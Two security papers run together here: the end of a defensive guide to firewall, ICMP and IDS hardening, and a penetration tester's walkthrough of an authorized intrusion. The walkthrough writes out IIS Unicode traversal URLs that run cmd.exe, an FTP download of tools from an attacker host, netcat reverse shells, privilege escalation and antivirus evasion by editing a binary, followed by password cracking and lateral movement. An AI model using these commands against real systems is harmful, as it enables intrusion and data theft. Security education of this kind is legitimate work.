This can be done by denying all traffic, and very carefully opening things up. Sometimes by clicking on a pretty icon in the firewall GUI control software labelled "DNS" or "Mail" we feel we are controlling the environment, but this may be opening up ports 53 and 25 to the world. If attackers learn this, they could use these openings to help set up covert channels. Ensure that when allowing public traffic into your network (DNS, SMTP, HTTP, FTP) that you do *not* allow these forms of traffic into your networks without limits. Check to make sure that turning on DNS in the firewall did not open up TCP and UDP port 53 to every device on your network. All public boxes, such as your Web, FTP, and mail servers should reside in a separate network (appropriately referred to as a "dead zone" or DMZ). These boxes should not be allowed to initiate network conversations with computers inside the internal network - if compromised, these boxes will be used as stepping stones to the internal network across all channels you leave open. All Internet-connected boxes should not have compilers on them, should have as few services running as possible, and should have fairly sophisticated modifications to prevent compromise (see the Host Recommendations section below). Make sure management channels and ports are closed or at least secured. For example, does turning on remote management to your Checkpoint Firewall automatically open up port 256? Make sure you've set things up correctly. Is SNMP closed from the outside? From the DMZ? While it is my opinion that all computers should be secured as adequately as possible, if you are on a limited budget, or you must prioritize what boxes get secured first, secure them in this order - firewall, public boxes in the DMZ, internal servers, workstations. 
Obviously keeping the boxes themselves as updated as possible is the most desired thing - the latest patches and tweaks - as this will make your systems less of a potential target or launch point for further attacks. ICMP Defenses Since a lot has been written about TCP/UDP rules for a firewall, but little has been written about ICMP, I've decided to expand upon the philosophy of handling ICMP at the firewall. It is considered "bad form" by some Internet pundits to turn off ICMP entirely. ICMP was originally developed to *help* networks, and is often used as a diagnostic tool by WAN administrators. But today the various inadequacies of ICMP are being used and abused in ways not originally intended by supporters of RFC 792, and certain strategies need to be implemented to make things a little safer. Therefore we need to try and contain as much of the abuse as possible without shooting ourselves in the foot. Most Internet-connected sites block inbound ICMP Echo to their internal networks, but do not block most everything else. This will still leave the site inadequately protected. Inbound ICMP Timestamp and Information Request will respond if not blocked, and both can be used for host enumeration across a firewall that allows such traffic through. Even forging packets with illegal or bad parameters can generate an ICMP Parameter Problem packet in return, thereby allowing yet another method of host enumeration. One of the common methods used to issue commands from a master to clients (especially if the clients are behind a firewall) in a stealth manner is to use ICMP Echo Reply packets as the carrier. Echo Replies themselves will not be answered and are typically not blocked at the firewall. An excellent early example of this type of communication can be found in Loki [11]. Loki was also pilfered from (at least in concept) during the development and evolution of TFN [1] as communications use Echo Reply packets between client and server pieces, which are also encrypted. 
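One rough way to see what an Echo Reply carrier looks like from a monitoring point: an Echo Reply that answers no Echo we sent is suspect. The sketch below illustrates that idea only. Packets are modelled as plain tuples rather than parsed from the wire, and the names IcmpPacket and find_unsolicited_replies are hypothetical; nothing here is taken from Loki, TFN, or any IDS product.

```python
# Sketch only: flag ICMP Echo Replies that answer no Echo we sent.
from typing import NamedTuple

ECHO_REPLY = 0   # ICMP type 0 (RFC 792)
ECHO = 8         # ICMP type 8 (RFC 792)


class IcmpPacket(NamedTuple):
    src: str
    dst: str
    icmp_type: int
    ident: int
    seq: int


def find_unsolicited_replies(packets, inside_hosts):
    """Return Echo Replies sent to inside hosts with no matching outbound Echo."""
    pending = set()      # (inside host, remote host, ident, seq) awaiting a reply
    unsolicited = []
    for p in packets:
        if p.icmp_type == ECHO and p.src in inside_hosts:
            pending.add((p.src, p.dst, p.ident, p.seq))
        elif p.icmp_type == ECHO_REPLY and p.dst in inside_hosts:
            key = (p.dst, p.src, p.ident, p.seq)
            if key in pending:
                pending.discard(key)     # legitimate answer to our own Echo
            else:
                unsolicited.append(p)    # nobody inside asked for this
    return unsolicited


if __name__ == "__main__":
    inside = {"10.0.0.5"}
    traffic = [
        IcmpPacket("10.0.0.5", "192.0.2.1", ECHO, 7, 1),
        IcmpPacket("192.0.2.1", "10.0.0.5", ECHO_REPLY, 7, 1),
        IcmpPacket("198.51.100.9", "10.0.0.5", ECHO_REPLY, 99, 0),
    ]
    for p in find_unsolicited_replies(traffic, inside):
        print("unsolicited Echo Reply from", p.src)
```

A real monitor would also have to expire old entries and cope with lost packets; this version keeps every outstanding request forever.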
First we have to approach the entire "ICMP limiting" problem in terms of both inbound and outbound. To cut some of the communication links in models outlined above we have to "contain" ICMP. ICMP Echo does come in handy for verifying that remote sites are up, but outbound Echo should be limited to support personnel (okay) or a single server/ICMP proxy (preferred). If we limit Echo to a single outbound IP address (via a proxy), then our Echo Replies should only come into our network destined for that particular host. Redirects are typically found in the wild between routers, not between hosts. The firewall rules should be adjusted to allow these types of ICMP only between the routers directly involved in the Internet connection that need the information. If the firewall is functioning as a router, it is quite possible that Redirects can be completely firewalled without adverse effects, both inbound and outbound. Source Quench packets are generated when a large amount of data is being pushed toward a host or router, and the host or router wishes to tell the sender to "slow things down". This is typically seen during streaming uploads of data to a host, and can be generated by a router along the way or via the target host itself. If the hosts inside the network can only upload to a host on the Internet via FTP, then it is possible that the only source of legitimate Source Quench packets will be destined toward the FTP proxy, and all other Source Quench traffic can be dropped. Time Exceeded packets are an interesting animal. There are two types of Time Exceeded packets - code zero for Time To Live (TTL) timeouts, and code one for fragmented packet reassembly timeout. The TTL is a value initialized and placed in the TTL field of a packet when it is first created, and as the packet crosses a network hop its TTL counter is decremented by one. 
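The TTL handling just described can be sketched in a few lines. This is a toy model under simplifying assumptions, not a real IP stack: routers are just names in a list, and the function name forward is hypothetical.

```python
# Sketch only: models the TTL countdown described above.
TIME_EXCEEDED = 11          # ICMP type 11 (RFC 792)
CODE_TTL_IN_TRANSIT = 0     # code 0: time to live exceeded in transit


def forward(initial_ttl, routers):
    """Walk a packet through routers; return (delivered, icmp_error)."""
    ttl = initial_ttl
    for router in routers:
        ttl -= 1                      # each hop decrements the TTL by one
        if ttl <= 0:
            # this router drops the packet and reports back to the sender
            return False, (router, TIME_EXCEEDED, CODE_TTL_IN_TRANSIT)
    return True, None


if __name__ == "__main__":
    print(forward(3, ["r1", "r2", "r3", "r4"]))
    print(forward(5, ["r1", "r2"]))
```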
Starting with a TTL of 64, once the 64th hop is crossed the router that decremented the TTL to zero will drop the packet and send a Time Exceeded back to the sender with a code of zero, indicating the maximum hop count was exceeded.

In the case of fragmented packet reassembly timeout, when a fragmented datagram is being reassembled and pieces are missing, a Time Exceeded code one is sent and the datagram is discarded. It is possible to perform host enumeration by sending fragmented datagrams with missing fragments, and waiting for the Time Exceeded code one to alert the sender that a host exists at the address, so care must be taken with the handling of these types of packets. It is recommended that all outbound traffic be proxied, so that inbound ICMP traffic comes back through the firewall to the proxy address. This at least limits Time Exceeded packets to a single inbound address.

But it is possible to block Time Exceeded packets. Most applications will have an internal timeout that is not dependent upon receiving a Time Exceeded packet, although some applications may still rely upon receiving one. YMMV on this one. Block it unless too many critical internal applications are affected.

The ICMP Parameter Problem packets are sent whenever an ICMP packet is sent with incorrect parameters that will cause the packet to be discarded. The host or router discarding the packet sends a Parameter Problem packet back to the sender, pointing out the bad parameter. By sending illegally constructed ICMP packets to a host, you can cause the host to reply with a Parameter Problem packet. Obviously if the type of illegally constructed ICMP is allowed through the firewall, you can enumerate hosts.

There is no reason to allow inbound or outbound Timestamp, Timestamp Reply, Info Request and Info Reply packets across the firewall. Whatever value they might have should be limited to the internal network only, and should never cross onto the open Internet.
The same may be said of Address Requests and Address Replies, as there is no real reason for a host to be aware of the destination's IP Address mask to send the packet. Address Requests and Replies are intended to assist diskless workstations booting from the net to determine their own IP address mask, especially if there is subnetting going on, so there is no reason to pass this traffic across a firewall (in fact, routers adhering to RFC 1812 will not forward an Address Request on to another network anyway).

The general philosophy here is that only publicly addressable servers (such as web, e-mail, and FTP servers), firewalls, and Internet-connected routers have any real reason to talk ICMP with the rest of the world. If adjusted accordingly, virtually all stealth communication channels that use ICMP, inbound or outbound, will be stopped.

Host Recommendations

What are some good precautions we can use on hosts connected to the Internet? We will not cover Microsoft offerings here, but will assume that we will be using only open source operating systems on hosts we have that are addressable from the Internet (Web, SMTP, FTP, etc).

All machines serving the public via the Internet should be locked down. Here is a recommended list of tactics to help protect the machines exposed to the Internet.

- Isolate all public servers to a DMZ.

- Each offered service should have its own server. For example, if your public services are email and web, do not try to save money and run both on the same server. Use separate servers.

- If using Linux (recommended) you can use any one or several of the "buffer overflow/stack execution" patches and additions to prevent most (if not all) local and remote buffer overflows that could lead to root compromise. Solar Designer's patch [13] is highly recommended as it includes additional security features, such as secured

- Instead of SSH, use Secure Remote Password (SRP) [14].
SRP offers PAM compatibility, drop-in replacement for telnet and FTP daemons, encrypted telnet and FTP sessions, and defeat of zero knowledge attacks. One great advantage to SRP is that only enough material to determine that you know the password is stored in the password file, so even if the password file is captured by an intruder it cannot be cracked. You can even have passwords up to 128 characters in length! - Limit access to those SRP-enabled telnet and FTP daemons to internal addresses only, and insist that only SRP-enabled clients can talk to them. If you must run regular FTP for public access (such as anonymous FTP) run SRP FTP on a different port. - Use trusted paths. Only allow execution of root-owned binaries that are in a directory owned by root that is not world or group writable. To enforce this you can modify the kernel if need be [15]. - Use the built-in firewalling capabilities. By turning on firewall rules you can often take advantage of the kernel's handling of state tables. The state table keeps track of IP addresses and port connections. If a packet is received that is *not* a SYN packet and *not* part of an existing conversation, drop the packet. This may require kernel modification to support it [16]. - Use some form of port scan protection. This can be done either via a daemon on Linux [17] or via kernel modifications [16]. - Use Tripwire [18] or an equivalent to help detect modifications to important files. Version 2.2.1 for Linux is freeware, other versions are not. IDS Recommendations Since many of the methods to defeat network-based IDS are still applicable to most commercial IDS products available (see [2], [3], and [4] for details), it is recommended using an IDS that at least can reassemble or at least detect fragmented datagram packets. This limits you to Snort [9], NFR, Dragon, and BlackIce [19], with Snort in its current version only able to detect very small fragment sizes of packets. 
Only Dragon can handle fragmented packet reassembly at high network speeds with lots of traffic. If you are on a budget, you can limp by with Snort, although any serious or high-traffic site is going to require Dragon to handle the load.

The next question is - what should I watch for? Here is a partial list:

- Be sure to include all of the existing rules, including new rules for some of the distributed DoS attacks (see [1] for details on those attacks).

- Since much of ICMP will be blocked if the ICMP Defenses section is followed, numerous opportunities for IDS triggers exist. Any inbound or outbound ICMP packets that would normally be blocked can be triggered upon.

- *Any* network traffic you have firewalled off can be a potential IDS trigger. Examine what you are blocking and why, and consider adding IDS rules to look for such packets.

- If your IDS supports detection of attacks over long periods of time (for example, a port scan) be sure to not exclude trusted hosts you might be allowing through the firewall. This includes VPNs. Spoofed packets from those trusted sites might *look* like normal traffic, but could possibly be probes or attacks.

- If you can train any user of ping to use small packet sizes when pinging hosts (such as 'ping -s 1 target.address.com'), set your IDS to look for Echo and Echo Replies with packets larger than 29 bytes (a 20-byte IP header, an 8-byte ICMP header, and 1 byte of data).

Conclusions

By securing the hosts, limiting the channels of communication between nefarious elements, and adjusting firewall and IDS rules, most of the network attacks outlined here (real and theoretical) can be defeated. A side effect of implementing these recommendations is that not only are distributed attack models stopped, but overall security is greatly enhanced. Full frontal attacks are easily detected and can be quickly avoided.

Acknowledgements

I would like to thank the BindView RAZOR team for their support during the writing of this paper.
Numerous times I asked the team questions and received answers that opened up new ideas. Their help was invaluable.

I'd also like to thank my wife and kids for being patient while I toiled away for hours over the computer. There is nothing like support from home.

References

Here are some articles and papers related to the subject presented here.

[1] David Dittrich (dittrich@cac.washington.edu) provided detailed analysis of three distributed denial of service tools found in the wild.
"The DoS Project's 'trinoo' distributed denial of service attack tool", http://staff.washington.edu/dittrich/misc/trinoo.analysis
"The 'Tribe Flood Network' distributed denial of service attack tool", http://staff.washington.edu/dittrich/misc/tfn.analysis
"The 'stacheldraht' distributed denial of service attack tool", http://staff.washington.edu/dittrich/misc/stacheldraht.analysis

[2] Thomas H. Ptacek and Timothy N. Newsham wrote an enormously influential paper discussing IDS avoidance, with many of the documented techniques still not corrected by commercial IDS vendors since the paper's debut in January of 1998.
"Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection", http://www.clark.net/~roesch/idspaper.html

[3] Rain Forest Puppy (rfp@wiretrip.net), author of numerous advisories, wrote a tool called whisker, which is a CGI vulnerability scanner. RFP wrote up this paper explaining the techniques he used in whisker, which could be applied to other protocols besides HTTP.
"A look at whisker's anti-IDS tactics", http://www.wiretrip.net/rfp/pages/whitepapers/whiskerids.html

[4] Greg Shipley did a review for Network Computing of intrusion detection systems, both host and network based. The results were interesting enough to influence some of the thoughts in this paper, as the article was much more interesting than one would expect for a trade magazine product review.
"Intrusion Detection: Take Two" http://www.networkcomputing.com/1023/1023f1.html [5] Simple Nomad (thegnome@nmrc.org) presentations to SANS covered possible network enumeration, host identification, and port scanning techniques using various adaptations of off-the-shelf products. "Network Cat and Mouse", SANS Network Security '99, New Orleans http://www.sans.org/, "The Paranoid Network", to be presented at SANS 2000, Orlando, FL [6] Simple Nomad (thegnome@nmrc.org) white paper that expanded on the ideas originally developed and presented in [5]. "Traffic Pattern Duplication to Avoid Intrusion Detection", To be released soon. [7] Fyodor (fyodor@dhp.com) has written NMap, considered to be one of the best host and host service enumeration tools available, loaded with tons of features. NMap, http://www.insecure.org/nmap/ [8] Jordan Ritter (jpr5@darkridge.com, jpr5@bos.bindview.com) has written a handy tool to sniff and grep through network traffic, appropriately called ngrep. ngrep, http://www.packetfactory.net/ngrep/ [9] Martin Roesch (roesch@clark.net) has written a great IDS called snort that is simple to use, fast, and free. snort, http://www.clark.net/~roesch/security.html [10] Stuart McClure, Joel Scambray, & George Kurtz have written a book entitled "Hacking Exposed" which uncovers numerous attacker techniques. The reverse telnet technique is detailed in Chapter 13, page 382-3. "Hacking Exposed", ISBN 0-07-212127-0, 1999 http://www.hackingexposed.com/ [11] Michael D. Schiffman wrote a white paper that illustrate a method for using ICMP to establish a covert communications method across a network, including across a firewall. Jeremy Rauch assisted Schiffman in developing proof of concept software, and Schiffman followed it up with a later article that covered implementation issues. Both are available at Phrack's web site at http://www.phrack.com/. "Project Loki: ICMP Tunnelling", Phrack 49, File 6 of 16, 1996. 
"LOKI2 (the implementation)", Phrack 51, File 6 of 17, 1997. [12] RFC 792, RFC 950, RFC 1122, RFC 1123, and RFC 1812, specifically section 4.3 of RFC 1812 on the handling of ICMP by routers. [13] Solar Designer's Linux kernel patch is available from http://www.openwall.com/linux/. [14] Thomas Wu developed Secure Remote Password (SRP) while attending Stanford. It touts a number of unique features, including defeating zero knowledge attacks and even protects against password recovery from the password file. SRP, http://srp.stanford.edu/srp/ [15] Michael D. Schiffman wrote two articles for Phrack which cover trusted path execution - one for Linux and one for OpenBSD. While the code will not cleanly patch current kernels, it is a good place to start. Visit http://www.phrack.com/. "Hardening the Linux Kernel", Phrack 52, File 6 of 20, 1998. "Hardening OpenBSD for Multiuser Environments", Phrack 54, File 6 of12, 1998. [16] Simple Nomad pulled together several security patches for 2.0.3x kernels and developed a single patch. Two of the included items show how to make use of the built-in state table and kernel-level port scan detection. nmrcOS kernel patches, http://www.nmrc.org/nmrcOS/ [17] Solar Designer's scanlogd daemon detects multiple port connections from a single address. NMap can easily defeat this with slower scans but it is still useful. scanlogd, http://www.openwall.com/scanlogd/ [18] Tripwire can be obtained from Tripwire, Inc. at http://www.tripwiresecurity.com/. The Linux version is free. 
[19] Commercial IDS products mentioned here can be obtained via the following vendors:
NFR IDA from NFR, http://www.nfr.net/
BlackIce from Network Ice Corp., http://www.networkice.com/
Dragon from Network Security Wizards, http://www.securitywizards.com/

You can find this paper and others like it at http://razor.bindview.com/

=================[ Autopsy of a Successful Intrusion ]==================

--- by Floydman ---

Abstract

This paper consists of the recollection and analysis of two network intrusions that I have performed as part of my duties as a computer security consultant. The name of the company I worked for, as well as those of the customers that I hacked into, will remain anonymous for obvious reasons. The goal of this paper is to show real life cases of what computer security looks like in the wild, in corporate environments. I will try to outline the principal reasons why these intrusions were successful, and why this kind of performance could be achieved by almost anybody, putting whole networks at risks that their owners don't even begin to realize yet.

Preface

It's been over a year now since I delved into computer security. Before that, I was doing computer support and server admin on various platforms: DOS, OS/2, Novell, Windows. I have always been kind of a hack, but I never realized it until I had enough free time ahead of me to start studying the hacking scene and the computer security industry more in depth. That is how I started writing whitepapers, and how I was eventually invited to a conference to present some of my work. But I didn't want to have problems with the law, and I was short on resources (money, boxes, bandwidth), so I limited myself to keeping track of new vulnerabilities and understanding how they worked without actually having the opportunity to try them on a real machine. So when I got this job and they asked me to try to hack these networks, I was really anxious to see what I could do.
After all, I can't be worse than a script kiddie, can I?

Targeted audience

This document is presented to anyone who has an interest in computer security, network intrusion, hacking, viruses and Trojan horses, network administration and computing in general.

Introduction

What I am about to describe here is the complete story of two successful network intrusions, where we (quickly and rather easily) had complete access to everything. These two networks are the same kind of networks that get infected all the time with I Love You, Melissa, Anna.Kournikova and Sircam, to name only a few. The people who run these networks, and the people who own them, can't keep ahead of plain viruses (for another sample of this, read "Virus protection in a Microsoft Windows network, or How to stand a chance"), let alone a dedicated intruder who will hopefully be smart enough to hide his tracks (but even that will soon not be a requirement if things keep up like this, as we'll see later). And these are networks owned by (apparently) respected big corporations, and they were equipped with firewalls and antivirus software. And they still wonder why e-commerce never lived up to expectations?

Technical background of the hack

Both networks were based on Microsoft systems, which is not that surprising since it is by far the most used platform in corporate environments, especially on the desktop. Both intrusions were made over the Internet with tools freely available on the Internet. They used vulnerabilities that had been known for quite a long time, and we sometimes had to use a bit of imagination to do the rest. If you are a Windows NT/2000 admin, what you are about to read should scare you to hell. If you are a malicious hacker who does this kind of thing for a living or just plain fun, you probably know all this stuff already. But you'll probably still want to read on to have a good laugh.
Both intrusions followed the same methodology, similar to that of a typical intrusion: gathering of information, analysis of the information, research of vulnerabilities, and implementation of the attack (we didn't have time to test on one of our machines, but that didn't matter), then repeat. Both attacks were done from our facilities using our dedicated ADSL line over the Internet. One of the intrusions involved going undercover physically onsite at the customer premises to plant a wireless hub on the network. A laptop equipped with a wireless network card was also used to link with the hub only momentarily, to avoid detection.

Some of the tools used were:

SuperScan       : to scan classes of IP addresses to determine open ports
CyberKit        : this tool lets you do IP information gathering (DNS lookups, traceroute, whois, finger)
nc.exe          : NetCat, ported to Win32. This program lets you initiate telnet connections on any port you want
hk.exe          : program that exploits a vulnerability in the Win32 API (LPC, Local Procedure Call) that can be used to get System Level access
net commands    : these should be known to all NT admins (net view, net share, net use, etc)
a hex editor    : these programs let you edit binary files in hexadecimal/ascii format, a bit similar to notepad for text files
l0phtcrack      : this software lets you crack the NT passwords file
whisker.pl      : this script will scan webservers for known vulnerabilities, along with instructions on how to exploit them
EditPad Classic : this is a Notepad Deluxe, where we gather the information collected during the hack

and other tools that I forgot, that were part of the NT Resource Kit, or that I will mention later in the text. Sugar input was provided by a supply of M&Ms and coke (the drink, not the sniff).

The first victim

Pseudonym : XYZ Media Publishing Corporation
Type of company : Big Media Corporation (TV, radio, newspapers, magazines, record company, don't they all do that nowadays?)
Time allowed to hack : 3 man-days
Goal : penetrate the network as far as possible and get evidence of intrusion

So I start at the beginning, making DNS lookups on their IP classes, whois requests, and port scans of the IP addresses of the company's main website as well as the subsidiaries' websites. It turns out that there are over 140 machines publicly exposed to the Internet (web servers, DNS, mail, B2B), mostly Windows NT machines, with a couple of *nix boxes in the lot. A quick header scan of the web servers shows a mix of IIS 3.0 and 4.0. Now, the problem is to figure out where to start.

Let's start with the obvious, the main website (NT 4.0, IIS 4.0). A quick check of the Bugtraq archive at SecurityFocus shows me that the "Directory traversal using Unicode vulnerability" is still quite popular (especially with script kiddies who use it to perform website defacements), even if it's been out for about a year already, especially since there is a new variation every couple of weeks or so. So I fire up my specially crafted hacking tool, MS Internet Explorer (sarcasm directed at the media covering hacking incidents).

The directory traversal vulnerability works by fooling the web server into giving you content located outside of the web directory that it is supposed to be limited to. By default (which must cover anything between 50% and 90% of the installed base), the content served by the server is located at C:\Inetpub\wwwroot. So, instead of requesting the document http://www.victim.com/index.html (which corresponds physically on the server to the file C:\Inetpub\wwwroot\index.html), you request something like http://www.victim.com/../../index.html, which will request the file C:\index.html. Of course, index.html doesn't exist on C:\, but that doesn't matter, since from there you can request any file that you know the location of, based on a default install.
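Seen from the admin's chair, the weakness above comes down to checking a request path before it has been fully decoded. A minimal sketch of the safer order (decode first, then canonicalize, then compare against the web root) follows. It is an illustration only and not how IIS works: the function name resolve_request and the POSIX-style WEB_ROOT are made up for the example, and it decodes only once, so it does not by itself deal with double-encoded input.

```python
# Sketch only: decode, canonicalize, then check containment in the web root.
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/inetpub/wwwroot"   # hypothetical document root


def resolve_request(url_path, root=WEB_ROOT):
    """Map a URL path to a file path under root, or return None if it escapes."""
    decoded = unquote(url_path)              # decode %xx escapes first
    decoded = decoded.replace("\\", "/")     # treat backslashes as separators
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None                              # request tried to leave the root


if __name__ == "__main__":
    print(resolve_request("/index.html"))
    print(resolve_request("/../../index.html"))
```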
One thing that comes to mind is the cmd.exe program, which you can use to issue commands on the web server as if you were sitting there typing in a DOS box. I have to say at this point that the vulnerability doesn't work exactly as I just described; that was a simplified explanation. The actual request looks like this:

http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+dir+c:\+/s

Notice that + replaces the [Space] character in your commands, and ?/c+ is required to pass parameters to cmd.exe. %1c%pc is the Unicode equivalent to /.. (other equivalents may work, see the Bugtraq entry about this vulnerability for more details).

So now we have in our browser window a complete listing of all files present on the C: drive of the server. We can do the same thing for the D: drive, to see if it's present, and if it is, do it for the E: drive, and so on. The idea is to gather as much information about the machine as we can. At this point, we know enough to see what software runs on the machine and where the data is located.

Notice that at this point, we could start to issue ping commands or net commands to try to map any internal network the server may be talking to, but issuing these commands with the web browser is not really convenient. So we're going to get a real command prompt.

First, I set up an FTP server (no anonymous access, of course) on my laptop and put my tools in the main FTP folder. Namely, I put nc.exe and hk.exe there, plus a couple from the Resource Kit. Then I use the FTP utility, conveniently waiting right where I expect it to be, to initiate a connection to my laptop and fetch my tools. Since the FTP program is interactive and I can only issue commands via the web server, I have to make an FTP script on the server. To do this, I simply issue echo commands redirected to a text file, using the directory traversal vulnerability.
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+open+ftp.intruder.com+>>ftp.txt
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+username>>ftp.txt
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+password>>ftp.txt
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+prompt>>ftp.txt
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+bin>>ftp.txt
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+mget+*.exe>>ftp.txt
http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+bye>>ftp.txt

I check my script with my web browser one last time to make sure I made no mistake, and then I launch the FTP session, assuming that the firewall permits this kind of traffic. And it does.

http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+ftp+-s:ftp.txt

Once this is done, I will use netcat to get a command prompt on the web server. Netcat is a very useful networking tool that you can use to communicate via any port and spawn a shell prompt. nc -h will give you these options:

C:\nc11nt>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

So I will launch netcat in listening mode on port 53 (also used by DNS, and allowed by the firewall) on my laptop, and launch a netcat connection bound to a command prompt from the web server to my laptop (using the browser once again).

In my DOS box:

nc -l -p 53

and it hangs there...

http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+nc+-d+-e+cmd.exe+my.IP.address.ADSL+53

And the hung DOS box gets:

Microsoft(R) Windows NT(TM)
(C)Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\wwwroot\scripts>_

Voilà, I have a prompt. I use the whoami command from the NT Resource Kit, and find out with disappointment that I am only INET_IUSR/Anonymous, the anonymous Internet user account. So the web server doesn't run under the Administrator account. That means that I still can't reach the NT password file (also called the SAM database) because of the restricted access. No problem, I think, I'll just initiate another telnet connection on another port (23, Telnet, why not?) by using the hk.exe tool. This tool uses a vulnerability involving an undocumented API call (NT_Impersonate_thread or something like that) that lets a thread (a part of a process running in memory) get the token (a security attribute that defines at what security level a thread can run, user space or kernel space) of a kernel thread (LSASS or equivalent).
To use this tool, you simply type hk followed by any command you would want to run if you had NT AUTHORITY/SYSTEM level privileges (this is above the Administrator account privileges). So I t

hk nc -d -e cmd.exe my.IP.address.ADSL 23
Bad command or file name

What the?!? I run a dir command, and true enough, I don't see any file named hk.exe. Did I forget to download it before? I make another FTP download (using the script again, because interactive FTP sessions over a netcat connection don't work too well), and sure enough I see the file being downloaded from my laptop. I run a dir command again, and the file still isn't there. So I go to C:\ and run dir hk.exe /s, and what do you know? It's in the C:\Program Files\Antivyrtec Associates\Antivirus\Quarantine\ folder. Damn, the stupid antivirus caught my file. How can I get root without it?

Most antivirus products work by matching byte streams of known viruses and other malware against the programs and files your computer uses. If a match is found, then the file is most probably dangerous, and the antivirus prevents the user from opening it. Polymorphic viruses exploit a flaw in this strategy by modifying themselves every time, making it difficult to find a reliable byte stream in the virus code that can be used to clearly identify it. Can I also use this flaw to my advantage? Of course. Actually, that day, I lost a lot of respect for antivirus products, seeing how easy it was to circumvent one.

Using a hex editor (I don't remember which one, but they all do pretty much the same thing), I opened hk.exe. What I now see is all the binary code of the executable, shown in a hexadecimal representation. On the right-hand side, we see an ASCII representation of each byte of code. Since this is compiled code, it is pretty hard to modify anything in there without screwing up the program and making it useless.
Especially since we don't know what bit pattern the antivirus software looks for, and I know nothing about reverse-engineering. The only thing editable in the program is a small section where we can actually read the message displayed by hk.exe when it successfully executes (something like "Your wish is my command, master"). What the heck, let's change that and see what happens. So I replace the string with XXXX XXXX XX XX XXXXXXXX XXXXXX, and rename the file hk2.exe (which is why I don't remember the exact string; now I only care to use hk2.exe). A quick FTP download later, and I make a dir comman

So anyway, I open another DOS box on my machine and I start a new listening connection on my laptop

nc -l -p 23

and I type the command

hk2 nc -d -e cmd.exe my.IP.address.ADSL 23

on the active netcat session on the web server, and we get:

hk2 nc -d -e cmd.exe my.IP.address.ADSL 23
lsass pid & tid are: 50 - 53
Launching line was: nc -d -e cmd.exe my.IP.address.ADSL 23
XXXX XXXX XX XX XXXXXXXX XXXXXXNtImpersonateClientOfPort suceeded

(On the listening DOS box)

Microsoft(R) Windows NT(TM)
(C)Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\wwwroot\scripts> whoami
NT AUTHORITY/SYSTEM

At this point, I see no reason to keep the first netcat connection, so I kill it. I am now in complete control of the web server and I can do whatever I want on it. I start to upload the SAM database to my laptop and I start cracking it with l0phtcrack, using a dictionary attack first, then a brute force attack to uncover the few passwords left, if any.

While the passwords crack, I continue investigating my newly owned machine. I issue the ipconfig command, and I see the IP addresses of the two network interface cards installed on the machine. The IP address on one of the NICs is indeed the public IP of the web server. The other one bears an internal IP address, and a few pings and net commands later, I have a complete list of the NT domains, PDCs, BDCs, and servers.
I could talk to the whole internal network! Using some of the usernames/passwords that I cracked, I could go into any domain and from there connect to any workstation. With net accounts, I saw some administrative accounts that I ha

As I hopped from one workstation to another, from server to server, I kept making dir c: and dir d: images and downloaded files from various interesting folders (marketing, HR, finance, IT, production, contracts, budget, etc.), along with a couple of Outlook mailboxes, which tells me that I could probably use the flaws in this software to send a custom virus to take control of a machine, but why bother? I already had access to everything: network maps, the list of software approved by IT, the standard configuration of a desktop, resumes from applicants, last year's and the current year's budgets for various departments, production status reports, finance reports, company acquisition plans and contracts, full employee lists with phone numbers, e-mails and salaries, layoff severance documents, and the full calendar appointments of some management people, along with their mailboxes, which also turned up some interesting things. I will always remember one e-mail that the guy I hacked into received from one of his friends. In the e-mail,

We were about to run out of time, since my three days were almost up. Let's not forget that I had to write a report after that, and that the customer only paid for that amount of time. But there was still a little piece of the network that I couldn't get access to. It was refusing any connection attempt from any domain that I already had control of. That was a separate NT domain, on its own class C network, with very restricted access, probably accessed only by the board of directors, if I go by the domain name. No password that had proved useful before would work. A port scan showed me that there was a web server on this network, and I knew it was an NT server, most probably running IIS 4 as well.
But how can I launch a web request from a DOS prompt in order to hack the server like I did the first one? I could probably make a tool someday, but I definitely don't have that kind of time on my hands right now. I see the gold, I want the gold (even though I have plenty already), and I am willin

Winvnc works a bit like nc, but instead of giving a simple command prompt, it gives full access to the graphical user interface (GUI) as if you were sitting in front of the machine, the same way PCAnywhere does. This has the side effect that a person sitting in front of the machine will see all your actions, which means that you have been spotted. In my case, I had nothing to lose, so the plan is to download Winvnc onto the machine I currently own, initiate the GUI connection from there, and then use the browser installed on the web server to launch a similar attack on the intranet server using the directory traversal vulnerability. From there, I hope to be able to find some usernames and passwords that I can use to gain access to the protected machines in the same fashion as I had done so far.

So I initiate the Winvnc session, and surprise, I see right in the middle of the screen two pop-up warnings from the antivirus software, generated by the two unsuccessful downloads of hk.exe, 2 days ago. So I click OK to remove any visual evidence of my presence, and I proceed to clean up after myself a bit, deleting all the stuff that I won't need anymore. I also notice some of the NT Res Kit tools that I used in another folder that was not mine. That made me wonder if it was the admin who conveniently installed them there for anyone to use, or if it was the

I was about to launch IE in order to finish my attack quickly and return to the stealthier DOS command prompt when a second surprise happens: Notepad opens up with a message saying "who r u?". I knew I could be spotted, and I have been spotted.
